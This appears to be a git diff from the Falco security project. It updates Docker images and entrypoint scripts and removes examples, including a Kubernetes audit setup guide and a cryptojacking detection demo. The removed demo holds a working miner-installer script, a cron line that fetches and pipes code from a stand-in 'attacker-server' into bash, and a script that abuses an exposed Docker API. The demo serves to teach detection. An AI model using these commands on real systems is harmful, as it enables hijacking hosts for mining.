LABEL usage="docker run -i -t -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
ENV HOST_ROOT /host
ENV HOME /root
COPY ./docker-entrypoint.sh /
ENTRYPOINT ["/docker-entrypoint.sh"]

View File

@@ -0,0 +1,28 @@
#!/usr/bin/env bash
#
# Copyright (C) 2020 The Falco Authors.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
echo "* Setting up /usr/src links from host"
for i in "$HOST_ROOT/usr/src"/*
do
base=$(basename "$i")
ln -s "$i" "/usr/src/$base"
done
/usr/bin/falco-driver-loader "$@"

View File

@@ -1,6 +1,6 @@
#!/usr/bin/env bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
@@ -16,11 +16,14 @@
# limitations under the License.
#
# set -e
# todo(leogr): remove deprecation notice within a couple of releases
if [[ ! -z "${SKIP_MODULE_LOAD}" ]]; then
echo "* SKIP_MODULE_LOAD is deprecated and will be removed soon, use SKIP_DRIVER_LOADER instead"
fi
# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
# Set the SKIP_DRIVER_LOADER variable to skip loading the driver
if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
if [[ -z "${SKIP_DRIVER_LOADER}" ]] && [[ -z "${SKIP_MODULE_LOAD}" ]]; then
echo "* Setting up /usr/src links from host"
for i in "$HOST_ROOT/usr/src"/*

View File

@@ -1,6 +1,6 @@
#!/usr/bin/env bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2020 The Falco Authors.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
@@ -16,11 +16,10 @@
# limitations under the License.
#
# set -e
# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
# Set the SKIP_DRIVER_LOADER variable to skip loading the driver
if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
if [[ -z "${SKIP_DRIVER_LOADER}" ]]; then
echo "* Setting up /usr/src links from host"
for i in "$HOST_ROOT/usr/src"/*

View File

@@ -13,7 +13,7 @@ WORKDIR /
ADD https://bintray.com/api/ui/download/falcosecurity/${VERSION_BUCKET}/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
RUN apt-get update -y && \
apt-get install -y libyaml-0-2 binutils && \
apt-get install -y binutils && \
tar -xvf falco-${FALCO_VERSION}-x86_64.tar.gz && \
rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
mv falco-${FALCO_VERSION}-x86_64 falco && \
@@ -21,6 +21,9 @@ RUN apt-get update -y && \
apt-get clean && \
rm -rf /var/lib/apt/lists/*
RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /falco/etc/falco/falco.yaml > /falco/etc/falco/falco.yaml.new \
&& mv /falco/etc/falco/falco.yaml.new /falco/etc/falco/falco.yaml
FROM scratch
COPY --from=ubuntu /lib/x86_64-linux-gnu/libanl.so.1 \
@@ -40,9 +43,6 @@ COPY --from=ubuntu /lib/x86_64-linux-gnu/libanl.so.1 \
COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libstdc++.so.6 \
/usr/lib/x86_64-linux-gnu/libstdc++.so.6
COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libyaml-0.so.2.0.5 \
/usr/lib/x86_64-linux-gnu/libyaml-0.so.2
COPY --from=ubuntu /etc/ld.so.cache \
/etc/nsswitch.conf \
/etc/ld.so.cache \
@@ -55,4 +55,4 @@ COPY --from=ubuntu /lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
COPY --from=ubuntu /falco /
CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]
CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

View File

@@ -1,48 +0,0 @@
FROM ubuntu:18.04
LABEL maintainer="cncf-falco-dev@lists.cncf.io"
LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name <name> <image>"
ARG FALCO_VERSION=latest
ARG VERSION_BUCKET=deb
ENV FALCO_VERSION=${FALCO_VERSION}
ENV VERSION_BUCKET=${VERSION_BUCKET}
ENV HOST_ROOT /host
ENV HOME /root
RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
# bash-completion \
# bc \
ca-certificates \
curl \
gnupg2 \
jq \
# netcat \
# xz-utils \
&& rm -rf /var/lib/apt/lists/*
RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
&& echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
&& apt-get update -y \
&& if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
# Change the falco config within the container to enable ISO 8601
# output.
RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
# Some base images have an empty /lib/modules by default
# If it's not empty, docker build will fail instead of
# silently overwriting the existing directory
RUN rm -df /lib/modules \
&& ln -s $HOST_ROOT/lib/modules /lib/modules
CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

View File

@@ -1,16 +1,20 @@
FROM fedora:31
LABEL name="falcosecurity/falco-tester"
LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> --name <name> falcosecurity/falco-tester test"
LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build --name <name> falcosecurity/falco-tester test"
LABEL maintainer="cncf-falco-dev@lists.cncf.io"
ENV FALCO_VERSION=
ENV BUILD_TYPE=release
ADD https://github.com/fullstorydev/grpcurl/releases/download/v1.6.0/grpcurl_1.6.0_linux_x86_64.tar.gz /
RUN dnf install -y python-pip python docker findutils jq unzip && dnf clean all
ENV PATH="/root/.local/bin/:${PATH}"
RUN pip install --user avocado-framework==69.0
RUN pip install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
RUN pip install --user watchdog==0.10.2
RUN pip install --user pathtools==0.1.2
RUN tar -C /usr/bin -xvf grpcurl_1.6.0_linux_x86_64.tar.gz
COPY ./root /

View File

@@ -6,7 +6,7 @@ RUN test -n FALCO_VERSION
ENV FALCO_VERSION ${FALCO_VERSION}
RUN apt update -y
RUN apt install dkms libyaml-0-2 -y
RUN apt install dkms -y
ADD falco-${FALCO_VERSION}-x86_64.deb /
RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb

View File

@@ -0,0 +1,21 @@
FROM ubuntu:18.04
LABEL maintainer="cncf-falco-dev@lists.cncf.io"
ARG FALCO_VERSION=
RUN test -n FALCO_VERSION
ENV FALCO_VERSION ${FALCO_VERSION}
RUN apt update -y
RUN apt install dkms curl -y
ADD falco-${FALCO_VERSION}-x86_64.tar.gz /
RUN cp -R /falco-${FALCO_VERSION}-x86_64/* /
# Change the falco config within the container to enable ISO 8601 output.
RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
COPY rules/*.yaml /rules/
COPY trace_files/*.scap /traces/
CMD ["/usr/bin/falco"]

View File

@@ -58,6 +58,7 @@ case "$CMD" in
# build docker images
build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "deb"
build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "rpm"
build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "tar.gz"
# check that source directory contains Falco
if [ ! -d "$SOURCE_DIR/falco/test" ]; then
@@ -68,11 +69,12 @@ case "$CMD" in
# run tests
echo "Running regression tests ..."
cd "$SOURCE_DIR/falco/test"
./run_regression_tests.sh "$BUILD_DIR/$BUILD_TYPE"
./run_regression_tests.sh -d "$BUILD_DIR/$BUILD_TYPE"
# clean docker images
clean_image "deb"
clean_image "rpm"
clean_image "tar.gz"
;;
"bash")
CMD=/bin/bash

View File

@@ -30,7 +30,7 @@ How to use.
How to build.
* cd docker/builder && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .
* cd docker/tester && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .
Environment.

View File

@@ -1,2 +0,0 @@
labels:
- area/examples

View File

@@ -1,117 +0,0 @@
# Demo of Falco Detecting Cryptomining Exploit
## Introduction
Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Falco.
Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
## Requirements
In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
## Example architecture
The example consists of the following:
* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
A separate container is created to launch the attack:
* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
## Example Walkthrough
### Start everything using docker-compose
To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
You will see fairly verbose output from dockerd:
```
host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
```
When you see log output like the following, you know that falco is started and ready:
```
falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
```
### Launch malicious container
To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
The script `launch_malicious_container.sh` performs the necessary POSTs:
* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
* `http://localhost:2375/containers/create?&name=docker123321-mysql`
* `http://localhost:2375/containers/docker123321-mysql/start`
Run the script via `bash launch_malicious_container.sh`.
### Examine cron output as malicious software is installed & run
`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
```
* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
```
It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.
You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
```
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql
```
Once the cron job runs, you will see output like the following:
```
host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
host-machine_1 | ***Checking for existing Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
host-machine_1 | ***Killing competing Miner programs
host-machine_1 | ***Reinstalling cron job to run Miner program
host-machine_1 | ***Configuring Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
host-machine_1 | ***Configuring system for Miner program
host-machine_1 | vm.nr_hugepages = 9
host-machine_1 | ***Running Miner program
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
```
### Observe Falco detecting malicious activity
To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
```
falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
```
### Cleanup
To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.

View File

@@ -1,14 +0,0 @@
server {
listen 8220;
server_name localhost;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}

View File

@@ -1 +0,0 @@
{"config": "some-bitcoin-miner-config-goes-here"}

View File

@@ -1,64 +0,0 @@
#!/bin/sh
echo "***Checking for existing Miner program"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Killing competing Miner programs"
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/sshd
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
echo "***Reinstalling cron job to run Miner program"
crontab -r || true && \
echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true
echo "***Configuring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Configuring system for Miner program"
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Running Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "***Ensuring Miner program is alive"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Reconfiguring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Reconfiguring system for Miner program"
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Restarting Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."

View File

@@ -1,7 +0,0 @@
#!/bin/bash
while true; do
echo "Mining bitcoins..."
sleep 60
done

View File

@@ -1,41 +0,0 @@
version: '3'
volumes:
host-filesystem:
docker-socket:
services:
host-machine:
privileged: true
build:
context: ${PWD}/host-machine
dockerfile: ${PWD}/host-machine/Dockerfile
volumes:
- host-filesystem:/etc
- docker-socket:/var/run
ports:
- "2375:2375"
depends_on:
- "falco"
attacker-server:
image: nginx:latest
ports:
- "8220:8220"
volumes:
- ${PWD}/attacker_files:/usr/share/nginx/html
- ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
depends_on:
- "falco"
falco:
image: falcosecurity/falco:latest
privileged: true
volumes:
- docker-socket:/host/var/run
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
tty: true

View File

@@ -1,7 +0,0 @@
{
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
"Image": "alpine:latest",
"HostConfig": {
"Binds": ["/etc:/mnt/etc"]
}
}

View File

@@ -1,12 +0,0 @@
FROM docker:stable-dind
RUN set -ex \
&& apk add --no-cache \
bash curl
COPY start-cron-and-dind.sh /usr/local/bin
ENTRYPOINT ["start-cron-and-dind.sh"]
CMD []

View File

@@ -1,11 +0,0 @@
#!/bin/sh
# Start docker-in-docker, but backgrounded with its output still going
# to stdout/stderr.
dockerd-entrypoint.sh &
# Start cron in the foreground with a moderate level of debugging to
# see job output.
crond -f -d 6

View File

@@ -1,14 +0,0 @@
#!/bin/sh
echo "Pulling alpine:latest image to docker-in-docker instance"
curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
echo "Creating container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
echo "Running container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'

View File

@@ -1,136 +0,0 @@
This page describes how to get [Kubernetes Auditing](https://kubernetes.io/docs/tasks/debug-application-cluster/audit) working with Falco.
Either using static audit backends in Kubernetes 1.11, or in Kubernetes 1.13 with dynamic sink which configures webhook backends through an AuditSink API object.
<!-- toc -->
- [Instructions for Kubernetes 1.11](#instructions-for-kubernetes-111)
* [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster)
* [Define your audit policy and webhook configuration](#define-your-audit-policy-and-webhook-configuration)
* [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging)
* [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco)
- [Instructions for Kubernetes 1.13](#instructions-for-kubernetes-113)
* [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster-1)
* [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging-1)
* [Deploy AuditSink objects](#deploy-auditsink-objects)
* [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco-1)
- [Instructions for Kubernetes 1.13 with dynamic webhook and local log file](#instructions-for-kubernetes-113-with-dynamic-webhook-and-local-log-file)
<!-- tocstop -->
## Instructions for Kubernetes 1.11
The main steps are:
1. Deploy Falco to your Kubernetes cluster
1. Define your audit policy and webhook configuration
1. Restart the API Server to enable Audit Logging
1. Observe Kubernetes audit events at falco
### Deploy Falco to your Kubernetes cluster
Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a falco service account, service, configmap, and daemonset.
### Define your audit policy and webhook configuration
The files in this directory can be used to configure Kubernetes audit logging. The relevant files are:
* [audit-policy.yaml](./audit-policy.yaml): The Kubernetes audit log configuration we used to create the rules in [k8s_audit_rules.yaml](../../rules/k8s_audit_rules.yaml).
* [webhook-config.yaml.in](./webhook-config.yaml.in): A (templated) webhook configuration that sends audit events to an ip associated with the falco service, port 8765. It is templated in that the *actual* IP is defined in an environment variable `FALCO_SERVICE_CLUSTERIP`, which can be plugged in using a program like `envsubst`.
Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the `ClusterIP`s associated with those services are routable.
```
FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < webhook-config.yaml.in > webhook-config.yaml
```
### Restart the API Server to enable Audit Logging
A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling audit log support for the apiserver, including copying the audit policy/webhook files to the apiserver machine, modifying the apiserver command line to add `--audit-log-path`, `--audit-policy-file`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
It is run as `bash ./enable-k8s-audit.sh <variant> static`. `<variant>` can be one of the following:
* `minikube`
* `kops`
When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
Its output looks like this:
```
$ bash enable-k8s-audit.sh minikube static
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 1190 1.2MB/s 00:00
***Copying audit policy/webhook files to apiserver...
audit-policy.yaml 100% 2519 1.2MB/s 00:00
webhook-config.yaml 100% 248 362.0KB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
$
```
### Observe Kubernetes audit events at falco
Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
## Instructions for Kubernetes 1.13
The main steps are:
1. Deploy Falco to your Kubernetes cluster
2. Restart the API Server to enable Audit Logging
3. Deploy the AuditSink object for your audit policy and webhook configuration
4. Observe Kubernetes audit events at falco
### Deploy Falco to your Kubernetes cluster
Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a Falco service account, service, configmap, and daemonset.
### Restart the API Server to enable Audit Logging
A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling dynamic audit support for the apiserver by modifying the apiserver command line to add `--audit-dynamic-configuration`, `--feature-gates=DynamicAuditing=true`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
It is run as `bash ./enable-k8s-audit.sh <variant> dynamic`. `<variant>` can be one of the following:
* `minikube`
* `kops`
When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
Its output looks like this:
```
$ bash enable-k8s-audit.sh minikube dynamic
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 1190 1.2MB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
$
```
### Deploy AuditSink objects
[audit-sink.yaml.in](./audit-sink.yaml.in), in this directory, is a template audit sink configuration that defines the dynamic audit policy and webhook to route Kubernetes audit events to Falco.
Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the ClusterIPs associated with those services are routable.
```
FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < audit-sink.yaml.in > audit-sink.yaml
```
### Observe Kubernetes audit events at falco
Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
## Instructions for Kubernetes 1.13 with dynamic webhook and local log file
If you want to use a mix of `AuditSink` for remote audit events as well as a local audit log file, you can run `enable-k8s-audit.sh` with the `"dynamic+log"` argument e.g. `bash ./enable-k8s-audit.sh <variant> dynamic+log`. This will enable dynamic audit logs as well as a static audit log to a local file. Its output looks like this:
```
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 2211 662.9KB/s 00:00
***Copying audit policy file to apiserver...
audit-policy.yaml 100% 2519 847.7KB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
```
The audit log will be available on the apiserver host at `/var/lib/k8s_audit/audit.log`.

View File

@@ -1,72 +0,0 @@
#!/usr/bin/env bash
set -euo pipefail
IFS=''
FILENAME=${1:-/etc/kubernetes/manifests/kube-apiserver.yaml}
VARIANT=${2:-minikube}
AUDIT_TYPE=${3:-static}
if [ "$AUDIT_TYPE" == "static" ]; then
if grep audit-webhook-config-file "$FILENAME" ; then
echo audit-webhook patch already applied
exit 0
fi
else
if grep audit-dynamic-configuration "$FILENAME" ; then
echo audit-dynamic-configuration patch already applied
exit 0
fi
fi
TMPFILE="/tmp/kube-apiserver.yaml.patched"
rm -f "$TMPFILE"
APISERVER_PREFIX=" -"
APISERVER_LINE="- kube-apiserver"
if [ "$VARIANT" == "kops" ]; then
APISERVER_PREFIX=" "
APISERVER_LINE="/usr/local/bin/kube-apiserver"
fi
while read -r LINE
do
echo "$LINE" >> "$TMPFILE"
case "$LINE" in
*$APISERVER_LINE*)
if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo "$APISERVER_PREFIX --audit-log-path=/var/lib/k8s_audit/audit.log" >> "$TMPFILE"
echo "$APISERVER_PREFIX --audit-policy-file=/var/lib/k8s_audit/audit-policy.yaml" >> "$TMPFILE"
if [[ $AUDIT_TYPE == "static" ]]; then
echo "$APISERVER_PREFIX --audit-webhook-config-file=/var/lib/k8s_audit/webhook-config.yaml" >> "$TMPFILE"
echo "$APISERVER_PREFIX --audit-webhook-batch-max-wait=5s" >> "$TMPFILE"
fi
fi
if [[ ($AUDIT_TYPE == "dynamic" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo "$APISERVER_PREFIX --audit-dynamic-configuration" >> "$TMPFILE"
echo "$APISERVER_PREFIX --feature-gates=DynamicAuditing=true" >> "$TMPFILE"
echo "$APISERVER_PREFIX --runtime-config=auditregistration.k8s.io/v1alpha1=true" >> "$TMPFILE"
fi
;;
*"volumeMounts:"*)
if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo " - mountPath: /var/lib/k8s_audit/" >> "$TMPFILE"
echo " name: data" >> "$TMPFILE"
fi
;;
*"volumes:"*)
if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo " - hostPath:" >> "$TMPFILE"
echo " path: /var/lib/k8s_audit" >> "$TMPFILE"
echo " name: data" >> "$TMPFILE"
fi
;;
esac
done < "$FILENAME"
cp "$FILENAME" "/tmp/kube-apiserver.yaml.original"
cp "$TMPFILE" "$FILENAME"

View File

@@ -1,82 +0,0 @@
apiVersion: audit.k8s.io/v1beta1 # This is required.
kind: Policy
# Don't generate audit events for all requests in RequestReceived stage.
omitStages:
- "RequestReceived"
rules:
# Log pod changes at RequestResponse level
- level: RequestResponse
resources:
- group: ""
# Resource "pods" doesn't match requests to any subresource of pods,
# which is consistent with the RBAC policy.
resources: ["pods", "deployments"]
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
# Resource "pods" doesn't match requests to any subresource of pods,
# which is consistent with the RBAC policy.
resources: ["clusterroles", "clusterrolebindings"]
# Log "pods/log", "pods/status" at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["pods/log", "pods/status"]
# Don't log requests to a configmap called "controller-leader"
- level: None
resources:
- group: ""
resources: ["configmaps"]
resourceNames: ["controller-leader"]
# Don't log watch requests by the "system:kube-proxy" on endpoints or services
- level: None
users: ["system:kube-proxy"]
verbs: ["watch"]
resources:
- group: "" # core API group
resources: ["endpoints", "services"]
# Don't log authenticated requests to certain non-resource URL paths.
- level: None
userGroups: ["system:authenticated"]
nonResourceURLs:
- "/api*" # Wildcard matching.
- "/version"
# Log the request body of configmap changes in kube-system.
- level: Request
resources:
- group: "" # core API group
resources: ["configmaps"]
# This rule only applies to resources in the "kube-system" namespace.
